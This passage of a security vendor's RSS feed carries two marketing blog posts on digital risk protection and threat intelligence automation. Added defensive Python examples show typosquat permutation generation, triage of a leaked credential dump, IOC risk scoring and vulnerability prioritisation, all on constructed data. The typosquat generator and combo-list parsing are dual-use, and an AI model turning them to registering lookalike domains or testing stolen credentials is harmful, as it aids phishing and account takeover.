        <h3>1. Visibility: A Complete, Bird’s-Eye View of Your Attack Surface</h3>
        <p>One of the most effective strategies employed by attackers today is to target the assets you don’t even know you own. After all, you can’t effectively defend what you don’t know exists. Things like shadow IT, exposed Remote Desktop Protocol (RDP) services, and misconfigured cloud buckets are all excellent first entry points for an attacker to exploit.</p>
        <p>That’s why, when considering digital risk management platforms, one of the most essential capabilities to look out for is the automated, continuous mapping of all these types of external assets (e.g., IPs, domains, certificates, cloud assets, code repositories). And for this kind of visibility to provide true value, this asset inventory must be enriched with vulnerability data and risk scores to not simply show you what’s there, but what’s exploitable and to what extent.</p>
        <p>To defend your attack surface effectively, you need to see your organization the way an adversary does—with all of those blind spots illuminated, and the low-hanging fruit lit with high beams.</p>
        <p>This level of continuous, prioritized visibility allows teams to move beyond asset discovery and toward risk-based defense. Platforms with capabilities like Recorded Future’s <a href="https://www.recordedfuture.com/resources/guides/prevent-digital-risks-from-impacting-business">Attack Surface Intelligence</a> deliver this comprehensive, continuous view, helping organizations identify and secure their most exposed points before they become entryways for attackers.</p>
        <h3>2. Comprehensive Intelligence: Real-Time Brand and Executive Protection</h3>
        <p>Brand impersonation, fraudulent social media accounts, and executive spoofing are among the fastest-growing forms of digital risk today. While the nature of these attacks differs significantly from more traditional breaches, that doesn’t mean they don’t come with serious consequences. Attacks like these can erode customer trust, hinder revenue, and even create regulatory exposure within minutes of going live.</p>
        <p>Therefore, an effective digital risk intelligence platform must provide continuous monitoring across the entire digital landscape—not only for typosquatting domains (e.g., www.amazoon.com, facebok.com) but also on social media platforms, app stores, and the dark web. What’s more, when a threat is detected, the platform should enable rapid remediation through integrated or automated takedown services. Because these types of attacks can damage trust and revenue within minutes, speed is critical when it comes to detection and remediation.</p>
        <p>Brand protection is no longer a marketing issue alone. This isn’t simply about how your company is perceived by the public. It is a core security requirement. With serious implications for revenue, regulatory compliance, reputation, and more, it is mission critical that your digital risk intelligence platform enables comprehensive and responsive brand and executive protection capabilities.</p>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/blog/digital-risk-protection-overview">Brand Intelligence</a>, for example, empowers teams to detect impersonation attempts in real time and act before harm spreads, keeping both the brand and its executives protected.</p>
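        <p>The typosquat monitoring described above, as an added example that is not Recorded Future’s code: it generates the common single-edit permutations of a protected brand label (omission, transposition, repetition, keyboard-neighbour and homoglyph replacement, insertion), then checks a feed of newly observed domains against them. The brand list, the domain feed and the minimal keyboard map are constructed for the demo; in practice the feed would come from certificate-transparency logs or zone-file diffs, and registrable labels should be derived with a public-suffix list rather than the single-label-TLD assumption used here.</p>

```python
"""Typosquat candidate generation and matching against newly observed domains.

Added example, not Recorded Future code. Everything below (brands, feed,
keyboard map) is constructed inline so the script runs offline.
"""
import string

# Minimal QWERTY adjacency, enough for the demo (assumption: a fuller map in production).
KEYBOARD_NEIGHBOURS = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr",
    "f": "drtgvc", "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn",
    "k": "jiolm", "l": "kop", "m": "njk", "n": "bhjm", "o": "iklp",
    "p": "ol", "q": "wa", "r": "edft", "s": "wedxza", "t": "rfgy",
    "u": "yhji", "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu", "z": "asx",
}
# Digits that pass for letters at a glance.
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5"}


def typosquat_candidates(label):
    """Return the set of single-edit typosquats of a domain label (no TLD)."""
    label = label.lower()
    n = len(label)
    out = set()
    for i in range(n):                              # omission: facebook -> facebok
        out.add(label[:i] + label[i + 1:])
    for i in range(n - 1):                          # transposition: amazon -> amaozn
        out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i in range(n):                              # repetition: amazon -> amazoon
        out.add(label[:i] + label[i] + label[i:])
    for i, ch in enumerate(label):                  # replacement: amazon -> amaz0n
        for sub in KEYBOARD_NEIGHBOURS.get(ch, "") + HOMOGLYPHS.get(ch, ""):
            out.add(label[:i] + sub + label[i + 1:])
    for i in range(n + 1):                          # insertion: paypal -> paypaal
        for sub in string.ascii_lowercase:
            out.add(label[:i] + sub + label[i:])
    out.discard(label)                              # the brand itself is not a squat
    return out


def registrable_label(domain):
    """'www.amazoon.com' -> 'amazoon'. Assumes a single-label TLD (no co.uk handling)."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def match_new_domains(brands, new_domains):
    """Return (domain, brand, rule) for every domain that squats or embeds a brand."""
    candidates = {b.lower(): typosquat_candidates(b) for b in brands}
    hits = []
    for domain in new_domains:
        label = registrable_label(domain)
        for brand, cands in candidates.items():
            if label == brand:
                continue                            # the brand's own registration
            if label in cands:
                hits.append((domain, brand, "typosquat"))
            elif brand in label:                    # amazon-login.net style
                hits.append((domain, brand, "brand-embedded"))
    return hits


BRANDS = ["amazon", "facebook", "paypal"]          # constructed watch list
NEW_DOMAINS = [                                     # constructed "newly observed" feed
    "www.amazoon.com", "facebok.com", "amazon.com", "amazon-login.net",
    "amaz0n.net", "example.org", "faceboook.com", "paypa1.com",
]

if __name__ == "__main__":
    for domain, brand, rule in match_new_domains(BRANDS, NEW_DOMAINS):
        print(f"{domain:20} impersonates {brand:10} via {rule}")
```

        <p>Every hit here is a candidate for takedown, not a verdict: a squat that resolves to nothing, or that the brand’s own legal team registered defensively, still matches, so the list is an input to a review and takedown queue rather than a block list.</p>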
        <h3>3. Securing Your Partnerships: Continuous Third-Party and Supply Chain Monitoring</h3>
        <p>Every vendor, supplier, and technology partner connected to your network expands your risk footprint. Today, as the average supply chain and number of third-party vendors expand exponentially, so do the associated risks. In fact, Verizon’s 2025 DBIR reports <a href="https://www.verizon.com/business/resources/T5ea/reports/2025-dbir-data-breach-investigations-report.pdf?cjdata=MXxOfDB8WXww&amp;CMP=afc_m_p_cj_na_ot_2022_99&amp;SID=78de3210-8e37-4234-93b5-4986f7430a7a&amp;cjevent=01177a0bbf1911f081ea053a0a82b838&amp;vendorid=CJM&amp;PID=100357191&amp;AID=11365093">third-party involvement in breaches doubled to 30% (from ~15% the year prior)</a>.</p>
        <p>With over a quarter (26%) of today’s organizations managing 250 or more third-party vendor relationships, monitoring third-party risk has become a daunting task. Remember, a breach in one of their environments can quickly become a problem of your own. Traditional vendor risk assessments and annual questionnaires simply can’t keep up with today’s enormous scale and rapid pace of change.</p>
        <p>This is why an effective digital risk intelligence platform must provide continuous visibility into the security posture of all third parties in your ecosystem. This includes real-time monitoring for data leaks, mentions on dark web forums, and newly discovered vulnerabilities that could impact your organization through a shared dependency.</p>
        <p>With Recorded Future’s <a href="https://www.recordedfuture.com/blog/digital-risk-management">Third-Party Intelligence</a> solution, organizations can proactively monitor their supply chains, receiving alerts the moment a vendor shows signs of compromise. This kind of ongoing visibility transforms vendor risk management from a reactive checkbox exercise into a continuous, intelligence-driven process.</p>
        <h3>4. No Stone Left Unturned: Dark Web and Leaked Credential Monitoring</h3>
        <p>One-in-five data breaches are now the result of compromised credentials, with the <a href="https://blog.checkpoint.com/security/the-alarming-surge-in-compromised-credentials-in-2025/?utm_source=chatgpt.com">total volume of compromised credentials surging by over 160% thus far in 2025 alone</a>. Leaked credentials are one of the most exploited gateways for cyberattacks today, fueling everything from phishing campaigns to ransomware. Detecting these exposures before they’re used is essential for preventing account takeover and data loss.</p>
        <p>That’s why real-time monitoring for leaked credentials is an essential capability for every modern digital risk intelligence platform. When selecting a platform, one must ensure it has persistent access to gated dark web forums, marketplaces, and paste sites where stolen data circulates. It must also be able to identify when employee or customer credentials appear for sale and correlate that data with active threat campaigns. Together, these capabilities form a backbone of defense that helps to <a href="https://www.recordedfuture.com/resources/guides/prevent-digital-risks-from-impacting-business">prevent digital risk from impacting your business</a>.</p>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence</a> capabilities excel in this area, offering deep visibility into dark web ecosystems and issuing automated alerts for compromised credentials or stolen data. By integrating this insight into daily operations, security teams can act swiftly to prevent compromise or other harm as a result of compromised credentials, shutting down risks before they evolve into active exploitation.</p>
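        <p>What an alert on a leaked credential should trigger, as an added example that is not Recorded Future’s code: a leaked combo list (email:password lines) is matched against the corporate directory, and each hit is triaged by whether the account exists, whether it is still enabled, and whether the leaked password still verifies against the current hash. The dump, the directory, the corporate domain and the PBKDF2 hashing are all constructed or assumed for the demo; in practice the verification step calls your identity provider, and the leaked plaintext is compared and discarded, never logged.</p>

```python
"""Triage of a leaked combo list against the corporate directory.

Added example, not Recorded Future code. The dump lines, the directory and
the hashing scheme (PBKDF2-HMAC-SHA256, standard library) are constructed
so the script runs offline.
"""
import hashlib
import hmac
import os

CORP_DOMAINS = {"example.com"}       # assumption: domains we own
ITERATIONS = 100_000


def hash_password(password, salt=None):
    """Return (salt, derived_key) for a password; salt is random per user."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def verify(password, salt, derived_key):
    """Constant-time check of a candidate password against a stored hash."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, derived_key)


def build_directory():
    """Constructed directory: email -> (salt, hash, active)."""
    users = {
        "alice@example.com": ("Winter2024!", True),
        "bob@example.com": ("correct horse battery staple", True),
        "carol@example.com": ("hunter2", False),     # disabled account
    }
    return {u: (*hash_password(p), active) for u, (p, active) in users.items()}


def parse_dump(lines):
    """Yield (email, password) from 'email:password' lines; skip malformed ones."""
    for raw in lines:
        line = raw.strip()
        if ":" not in line:
            continue
        email, password = line.split(":", 1)
        email = email.strip().lower()               # normalise before lookup
        if "@" not in email or not password:
            continue
        yield email, password


def triage(dump_lines, directory):
    """Return (email, action) for every leaked credential on a corporate domain."""
    findings = []
    for email, password in parse_dump(dump_lines):
        if email.rsplit("@", 1)[1] not in CORP_DOMAINS:
            continue                                # not ours; ignore
        record = directory.get(email)
        if record is None:
            findings.append((email, "unknown-account"))   # ex-employee, alias, or fake
            continue
        salt, derived_key, active = record
        if not active:
            findings.append((email, "disabled-account"))
        elif verify(password, salt, derived_key):
            findings.append((email, "force-reset"))       # leaked password still works
        else:
            findings.append((email, "notify"))            # stale here, maybe reused elsewhere
    return findings


DUMP = [                                            # constructed combo list
    "alice@example.com:Winter2024!",
    "Bob@Example.com:OldPassword1",
    "carol@example.com:hunter2",
    "dave@example.com:letmein",
    "someone@other.org:password",
    "garbage line",
]

if __name__ == "__main__":
    for email, action in triage(DUMP, build_directory()):
        print(f"{email:22} -> {action}")
```

        <p>The "notify" case matters as much as "force-reset": a password that no longer works on the corporate account was very likely reused on something else, which is exactly what credential-stuffing campaigns count on.</p>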
        <h3>5. Integration and Contextualization: A Unified Intelligence Core That Provides Context</h3>
        <p>Without a unified intelligence framework, even the best tools can create more confusion than clarity. Siloed systems generate endless alerts but rarely explain how one threat connects to another. This often results in a morass of disjointed data that leaves teams overwhelmed and uncertain of what actions to take in order to mitigate their digital risk.</p>
        <p>It is only the most mature and advanced of digital risk management platforms that bring these disparate sources and signals together to create a single, coherent, and unified picture of an organization’s overall state and provide the context necessary to inform action. Such systems operate from a single intelligence graph: one that correlates data from the open, deep, and dark web, as well as technical sources like malware sandboxes and exploit feeds. This unified approach allows security teams to see how individual risks fit into broader attack narratives and stay ahead of threats as they manifest across the digital ecosystem.</p>
        <p>For example, the platform should make it possible to connect a leaked credential to a threat actor exploiting a vulnerability in a vendor’s system (effectively combining multiple key capabilities to create a single, streamlined picture of specific threats in context). Recorded Future’s <a href="https://www.recordedfuture.com/platform/intelligence-graph">Intelligence Graph®</a> provides exactly that level of correlation, transforming raw data into actionable, prioritized intelligence that allows teams to make sense of the ever-evolving threat landscape and their organization’s place within it.</p>
        <p>Together, these capabilities prove indispensable in the uphill battle that is <a href="https://www.recordedfuture.com/blog/digital-risk-protection-overview">digital risk protection</a>. Lacking just one can be enough to undermine one’s efforts entirely.</p>
        <h2>The Universal Approach: Recorded Future’s Intelligence Cloud</h2>
        <p>Modern digital risk management is a complex task that consists of a multitude of systems and signals. Running and managing separate tools for brand monitoring, attack surface management, supply chain risk, and more often creates more problems than it solves. Each system generates its own alerts and dashboards, forcing analysts to piece together the full picture manually.</p>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/platform">Intelligence Cloud</a> eliminates that complexity. It unifies the five capabilities outlined above (attack surface visibility, brand and executive protection, third-party intelligence, dark web and leaked credential monitoring, and graph-based correlation), together with its threat and vulnerability intelligence, in one real-time, correlated platform. This comprehensive, integrated approach ensures every piece of data contributes to a larger understanding of risk. Instead of isolated alerts, users receive a complete threat narrative: what’s happening, why it matters, and what to do next.</p>
        <p>Organizations that adopt this model not only strengthen their defenses but also gain the ability to prioritize resources effectively and demonstrate the ROI of intelligence-driven security.</p>
        <h2>Move From Reactive Defense to Proactive Intelligence</h2>
        <p>Most security teams are already overwhelmed by alerts. A digital risk intelligence platform shouldn’t add more—it should provide clarity. By consolidating external risk data into one unified view, organizations can make faster, better-informed decisions and shift from reactive defense to proactive intelligence.</p>
        <p>Investing in a single, unified platform, like Recorded Future’s, that sees and connects everything reduces analyst fatigue, accelerates response, and empowers leaders to justify their security investments with confidence.</p>
        <p>Yesterday’s perimeter-focused defense paradigm is over. Now, your organization must have visibility and control over every activity, portal, and point of entry online. Recorded Future’s Intelligence Cloud embodies this shift, offering the complete picture of digital risk every modern enterprise needs.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_190a9f903d9fbd7b56c2e00fd894596d5b7793258.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat Intelligence Automation]]></title>
            <link>https://www.recordedfuture.com/blog/threat-intelligence-automation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-intelligence-automation</guid>
            <pubDate>Thu, 20 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how threat intelligence automation from Recorded Future empowers security teams with real-time insights, faster response, and greater efficiency.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Real-time intelligence at scale: Threat intelligence automation accelerates detection and response by processing vast threat data instantly, <a href="https://www.recordedfuture.com/blog/why-manual-cyber-operations-can-create-dangerous-gaps">far faster than any manual analysis could achieve</a>.</li>
          <li>Enhanced SOC efficiency: Automation filters false positives and handles repetitive tasks so analysts focus on true threats.</li>
          <li>Recorded Future advantage: Recorded Future’s Intelligence Cloud delivers automated threat protection through real-time data collection, machine learning analysis, and seamless integrations with tools like SIEM, SOAR, and EDR.</li>
          <li>Future-ready defense: AI and ML algorithms adapt to new attack patterns, enabling predictive threat detection and rapid response.</li>
        </ul>
        <h2>Introduction: The Need for Speed in Cybersecurity</h2>
        <p>Cyber threats are expanding in volume, complexity, and velocity. Enterprises receive thousands of security alerts every single day, and human analysts manually collecting and correlating threat data can’t keep up. These reactive workflows lead to slow threat detection and delayed response, giving attackers more time to cause damage. The result is not only missed attacks but also burned-out analysts, who face constant alert fatigue and repetitive tasks.</p>
        <p>When a breach can unfold in minutes, organizations can’t afford hours (or days) of lag. Threat intelligence automation allows security teams to respond to indicators of compromise (IOCs) within seconds, stopping attacks before they spread—and reducing the potential financial and reputational damages from a breach. The push for speed has spurred a rise in <a href="https://www.recordedfuture.com/resources/guides/state-of-ai-2025">AI and automation</a> across cybersecurity as security leaders increasingly recognize how real-time, autonomous decisions can bolster defense.</p>
        <h2>What Is Automated Threat Protection?</h2>
        <p>Automated threat protection, also known as autonomous threat protection, refers to the use of advanced technologies—including AI and ML—to continuously gather, analyze, and act on threat intelligence without manual intervention. It streamlines the entire threat intelligence lifecycle, from data collection to detection to response, at machine speed.</p>
        <p>Core capabilities of automated threat protection platforms include ingesting data from diverse sources (open web, dark web, technical feeds, internal logs, etc.), automatically correlating and analyzing threat signals, and triggering protective actions or alerts. Key functions often include real-time monitoring for IOCs, enrichment of alerts with contextual data, automated risk scoring of threats, and even initiating response workflows via SOAR (Security Orchestration, Automation, and Response) playbooks. These systems excel at processing information at a scale and speed impossible for human operators.</p>
        <p>To illustrate the difference: in a manual workflow, if a new phishing domain targeting your company is discovered, an analyst might spend precious time gathering WHOIS information, checking threat feeds for references, assessing the domain’s legitimacy, and then coordinating a response. By the time this manual analysis is done, the phishing campaign could have claimed victims. In contrast, automated threat protection can instantly recognize the suspicious domain, enrich the alert with WHOIS data and threat actor profiles, check if the domain appears in malware or phishing databases, and even automatically block the domain via integrated security controls, all before a human even starts investigating. Any such automatic block should be scoped and reversible, for instance a DNS sinkhole entry with an expiry, so that a false positive on a legitimate domain degrades gracefully rather than causing an outage.</p>
        <h2>How Threat Intelligence Automation Enhances Real-Time Security Decisions</h2>
        <p>Threat intelligence automation <a href="https://www.recordedfuture.com/blog/from-speed-to-consistency-power-automation-for-your-soc">directly improves the speed and quality of security decisions</a> in several ways:</p>
        <h3>Faster Detection and Response</h3>
        <p>Automation enables security teams to detect threats or intrusions within moments of their emergence. By automatically correlating internal logs with external intelligence feeds, an automated system can spot malicious activity and trigger a response in machine time. This might mean isolating a compromised host or alerting on a zero-day exploit mere seconds after it’s observed. The net effect is that incidents are contained before they escalate widely.</p>
        <h3>Reduced False Positives</h3>
        <p>Intelligent automation learns what “normal” looks like in an environment and filters out the noise of benign events or erroneous alerts. Over time, machine learning models can identify patterns of false positives and automatically dismiss or deprioritize them. By letting automation sift signal from noise, human analysts can reclaim hours of wasted time and focus attention on genuine threats. The suppression itself needs to stay visible and reviewable: whatever pattern a model learns to dismiss as benign, it will also dismiss a true positive that fits the same pattern, so suppressed alert classes should be sampled periodically by an analyst.</p>
        <h3>Improved Threat Prioritization</h3>
        <p>Automated threat intelligence tools provide rich context around each indicator or alert instantly. For example, when an alert comes in, an automation system might automatically append information about the involved IP’s reputation, associated malware, threat actor groups, prevalence in the wild, and more. This contextual enrichment allows the system to assess which alerts pose the greatest risk.</p>
        <h3>Consistent, round-the-clock protection</h3>
        <p>Automated systems never sleep, operating 24/7 with consistency and scaling to handle surges in threat activity. This around-the-clock monitoring means critical warnings are never missed and aligns security operations to the always-on nature of cyber attacks. Automation also enforces consistency in how threats are handled; a playbook executed by a machine will run the same way every time, reducing the variability (and potential errors) of human responses.</p>
        <h2>Recorded Future’s Approach to Automated Threat Protection</h2>
        <p>Recorded Future’s Intelligence Cloud is a SaaS platform that delivers real-time, automated threat intelligence at scale. It continuously collects billions of data points from across the open web, dark web, technical sources (like malware feeds and network telemetry), as well as insights from Recorded Future’s own research team, <a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group®</a>. All of this data is analyzed and risk-scored in real time using machine learning algorithms.</p>
        <p>A key strength of Recorded Future’s approach is seamless integration. The Intelligence Cloud connects directly with popular SIEM, SOAR, EDR, and Threat Intelligence Platform (TIP) tools. This means when your SOC’s SIEM generates an alert, Recorded Future automatically enriches that alert with context within the tool you’re already using. If an alert about a suspicious IP comes into your SIEM, the Intelligence Cloud can, in real time, append that IP’s risk score, known associations, or related domains—even triggering automated response playbooks in your SOAR platform based on its intelligence.</p>
        <p>Recorded Future’s platform assigns risk scores to IOCs in real time, using analytics that weigh factors like novelty, prevalence, and severity of associated threat activity. So when an alert involving a particular IOC hits a SOC, the Intelligence Cloud has already flagged it as high risk and enriched it with context, such as the ransomware family or threat actor.</p>
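        <p>The enrichment and scoring loop described in the two paragraphs above, as an added example that is not Recorded Future’s scoring model: indicators are extracted from sample log lines, looked up in an intelligence store, scored on novelty, prevalence and the severity of associated threats, and mapped to a SOAR action. The log lines, the intelligence entries, the weights and the action thresholds are all constructed for the demo; the point is the shape of the pipeline, not the numbers.</p>

```python
"""SIEM alert enrichment and IOC risk scoring over sample log lines.

Added example, not Recorded Future code. Intel entries, log lines, weights
and thresholds are constructed; swap in your TIP lookup and SOAR client.
"""
import re
from datetime import date

TODAY = date(2025, 11, 20)            # fixed so the example is deterministic

INTEL = {                              # constructed intelligence store
    "203.0.113.10": {"first_seen": date(2025, 11, 15), "sightings": 412,
                     "threats": [("Cobalt Strike C2", 9), ("ransomware affiliate", 8)]},
    "198.51.100.7": {"first_seen": date(2024, 2, 1), "sightings": 3,
                     "threats": [("mass scanner", 2)]},
    "evil-update.example": {"first_seen": date(2025, 11, 19), "sightings": 20,
                            "threats": [("phishing kit", 6)]},
}

# Constructed log format: "... src=<ip> dst=<ip> [host=<fqdn>] ..."
LOG_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+)(?: host=(?P<host>\S+))?")


def extract_indicators(line):
    """Pull the destination IP and, when present, the HTTP host from a log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    found = [m.group("dst")]
    if m.group("host"):
        found.append(m.group("host"))
    return found


def risk_score(entry, today=TODAY):
    """0-99 score: worst severity dominates; novelty and prevalence break ties."""
    age_days = (today - entry["first_seen"]).days
    novelty = max(0.0, 1.0 - age_days / 90)             # 1.0 when brand new, 0 after 90 days
    prevalence = min(entry["sightings"], 100) / 100      # saturates at 100 sightings
    severity = max(s for _, s in entry["threats"]) / 10  # worst associated threat, 0-1
    return round(99 * (0.6 * severity + 0.25 * prevalence + 0.15 * novelty))


def action_for(score):
    """Map a score to the SOAR playbook to trigger (thresholds are assumptions)."""
    if score >= 80:
        return "block-and-isolate"
    if score >= 50:
        return "ticket"
    if score >= 25:
        return "watch"
    return "ignore"


def enrich(lines):
    """Return one enriched record per indicator that has intelligence."""
    results = []
    for line in lines:
        for ioc in extract_indicators(line):
            entry = INTEL.get(ioc)
            if entry is None:
                continue                                 # no intel: nothing to add
            score = risk_score(entry)
            results.append({"ioc": ioc, "score": score, "action": action_for(score),
                            "context": [name for name, _ in entry["threats"]],
                            "line": line})
    return results


LOG_LINES = [                                            # constructed SIEM events
    "2025-11-20T10:01:05Z fw allow src=10.0.0.5 dst=203.0.113.10 dport=443",
    "2025-11-20T10:01:09Z proxy GET src=10.0.0.8 dst=192.0.2.44 host=evil-update.example",
    "2025-11-20T10:02:00Z fw allow src=10.0.0.9 dst=198.51.100.7 dport=22",
    "2025-11-20T10:02:30Z fw allow src=10.0.0.9 dst=8.8.8.8 dport=53",
]

if __name__ == "__main__":
    for r in enrich(LOG_LINES):
        print(f"{r['ioc']:22} score={r['score']:2} action={r['action']:18} {r['context']}")
```

        <p>Prevalence cuts both ways: a high sighting count on a shared CDN or hosting address says more about the address than about your event, so an automated block action should also check the indicator against an allow list of shared infrastructure before it fires.</p>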
        <p>Recorded Future’s approach centers on delivering actionable insight in real time and <a href="https://www.recordedfuture.com/use-case/automation-security-workflows">automating wherever possible</a>. Teams can trust they’re never operating on out-of-date information, and that many threat defense actions are happening autonomously at machine speed.</p>
        <p>Example use cases include:</p>
        <ul>
          <li><strong>Phishing detection:</strong> Suppose a new phishing email campaign targeting a financial institution is identified. Recorded Future’s Intelligence Cloud can automatically spot the phishing domains or URLs as soon as they appear on phishing feeds or dark web forums, immediately flagging them as malicious, enriching them with context, and integrating with your email security or firewall to block them.</li>
          <li><strong>Vulnerability prioritization:</strong> Recorded Future’s automation helps organizations stay ahead by tracking vulnerability disclosures and exploit chatter continuously. If a new critical vulnerability is published, the Intelligence Cloud will instantly assess if there are exploit kits or threat actors discussing it. Through integrations, it can automatically create a ticket in your ITSM or send an alert to your vulnerability management dashboard highlighting that this CVE is under active attack and should be prioritized.</li>
        </ul>
        <h2>Benefits of Adopting Recorded Future for Automated Threat Protection</h2>
        <h3>Speed and Scale in Decision-Making</h3>
        <p>Through automation, organizations can make security decisions at a speed and scale that human teams alone cannot match. Threats are identified, contextualized, and even countered in real time. This machine-speed detection and response means attacks can be thwarted before they escalate into major incidents, compressing the threat response timeline from what might be hours or days down to minutes.</p>
        <h3>Better Resource Allocation</h3>
        <p>When you automate data gathering and initial threat analysis, skilled personnel are freed up to focus on what they do best: in-depth investigations, incident response, threat hunting, and security strategy. This not only improves job satisfaction but also means your team’s expertise is directed at tasks that truly require human judgement. This often leads to cost savings or the ability to handle more threats with the same headcount.</p>
        <h3>Continuous Monitoring With Global Visibility</h3>
        <p>Recorded Future provides continuous, 24/7 monitoring of threats worldwide. It’s like having an around-the-clock sentry that never takes a break. Organizations gain insight into emerging threats and external risks relevant to them, no matter where those threats originate. If a threat actor in another part of the world starts planning attacks against your industry, Recorded Future’s platform may pick up on early warning signs and automatically alert you. This means you’re not only monitoring your internal environment but also the external horizon for incoming risks, all through an automated system.</p>
        <h3>Reduced Time to Detect and Respond</h3>
        <p>Ultimately, adopting an automated threat intelligence solution like Recorded Future dramatically reduces the Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR) for security incidents. Automated response or enrichment means incidents can be contained or remediated far faster. A faster detection/response cycle directly correlates with minimizing damage—the quicker you intercept an attack, the less harm it can do. If you can cut your detection time from the <a href="https://www.ibm.com/reports/data-breach">industry average</a> of ~200 days down to near real-time, you potentially save millions in breach costs.</p>
        <h3>Strengthened Security Posture</h3>
        <p>By integrating real-time insights and automated actions into daily operations, organizations can close security gaps and achieve a more consistent defense posture. Automation ensures that no critical threat intelligence is missed or ignored, and that defenses are applied uniformly across the board. Moreover, automation enforces best practices automatically, ensuring processes are followed correctly every time. All of this leads to a significant uplift in an organization’s ability to prevent breaches and handle incidents effectively.</p>
        <h2>Practical Applications and Use Cases</h2>
        <h3>Automated IOC Detection</h3>
        <p>Modern threat intelligence platforms can automatically detect and surface indicators of compromise that matter to your organization. Rather than relying on an analyst to manually find a malicious IP or file hash buried in feeds, automation pulls these out in real time. If chatter about a new malware hash or command-and-control server related to your industry appears on a dark web forum, for example, the system will immediately flag it, ensuring you learn of emerging threats the moment they arise.</p>
        <h3>Threat Hunting with Automated Enrichment</h3>
        <p>Threat hunters and researchers greatly benefit from automation when investigating suspicious events. Suppose an analyst is digging into an odd network beacon that might indicate a hidden attacker. With automated enrichment tools, they can get additional context in seconds, such as domain reputation, related threats, or historical occurrences of that indicator. The analyst enters the indicator and the platform aggregates intelligence from open source feeds, commercial intel, and internal data. This on-demand enrichment provides deeper insights instantly, improving both the speed and accuracy of threat hunts.</p>
        <h3>Proactive Defense Through Vulnerability Intelligence</h3>
        <p>Rather than playing catch-up after hackers exploit a vulnerability, organizations can use threat intelligence automation to stay ahead of exploits. Automated systems continuously track CVEs, exploit releases, and even discussions on hacking forums about particular software weaknesses. When something relevant to your tech stack pops up, the system will alert you and provide threat context (e.g., known exploits or ransomware leveraging that CVE). This proactive vulnerability intelligence means you can patch or implement mitigations before an attack hits.</p>
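        <p>The vulnerability prioritization described here and in the use-case list earlier, as an added example that is not Recorded Future’s code: a vulnerability intelligence feed is joined against the asset inventory so that only findings present in your stack survive, and those are then tiered by exploitation evidence (exploited-in-the-wild listing, ransomware linkage, public exploit, forum chatter) and exposure rather than by CVSS alone. The vulnerability identifiers, scores, products and hosts are placeholders constructed for the demo, not real advisories.</p>

```python
"""Joining vulnerability intelligence with the asset inventory and tiering the result.

Added example, not Recorded Future code. Identifiers such as "vuln-A" are
placeholders, and every score, flag and host below is constructed.
"""
from dataclasses import dataclass


@dataclass
class VulnIntel:
    vid: str              # placeholder identifier, not a real CVE
    product: str
    cvss: float
    in_kev: bool          # listed in an exploited-in-the-wild catalogue
    public_exploit: bool  # working exploit code is public
    chatter: int          # forum / paste mentions seen by the intel source
    ransomware: bool      # observed in ransomware intrusions


FEED = [                                                          # constructed feed
    VulnIntel("vuln-A", "vpn-gateway", 9.8, True, True, 40, True),
    VulnIntel("vuln-B", "mail-server", 7.5, False, True, 12, False),
    VulnIntel("vuln-C", "hr-portal", 9.1, False, False, 2, False),
    VulnIntel("vuln-D", "crm-suite", 8.8, True, True, 30, False),  # product not in our stack
    VulnIntel("vuln-E", "mail-server", 5.3, False, False, 0, False),
]

INVENTORY = {                                                     # product -> (host, internet_facing)
    "vpn-gateway": [("vpn1", True), ("vpn2", True)],
    "mail-server": [("mx1", True), ("mail-int", False)],
    "hr-portal": [("hr-app", False)],
}


def tier(v, hosts):
    """P1..P4 from exploitation evidence and exposure; CVSS only matters at the bottom."""
    exposed = any(facing for _, facing in hosts)
    if (v.in_kev or v.ransomware) and exposed:
        return "P1"       # actively exploited and reachable from the internet
    if v.in_kev or v.ransomware or v.public_exploit:
        return "P2"       # exploitable now, but internal or not yet seen in the wild
    if v.chatter > 0 or v.cvss >= 9.0:
        return "P3"       # attackers are talking about it, or the score alone is alarming
    return "P4"


def prioritize(feed, inventory):
    """Drop findings for products we do not run, tier the rest, sort by tier then CVSS."""
    rows = []
    for v in feed:
        hosts = inventory.get(v.product)
        if not hosts:
            continue                                              # not in our stack
        rows.append({"id": v.vid, "product": v.product, "tier": tier(v, hosts),
                     "hosts": [h for h, _ in hosts], "cvss": v.cvss})
    rows.sort(key=lambda r: (r["tier"], -r["cvss"]))
    return rows


if __name__ == "__main__":
    for r in prioritize(FEED, INVENTORY):
        print(f"{r['tier']} {r['id']:8} {r['product']:12} cvss={r['cvss']} hosts={r['hosts']}")
```

        <p>Note that the CVSS 9.1 finding lands below the CVSS 7.5 one: the lower-scored bug has a public exploit and sits on an internet-facing host, which is what the patch queue should reflect.</p>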
        <p>There are a range of ways in which <a href="https://www.recordedfuture.com/case-studies">different sectors</a> leverage threat intelligence <a href="https://go.recordedfuture.com/automation-ebook">automation</a> in ways tailored to their unique challenges:</p>
        <h3>Financial Services</h3>
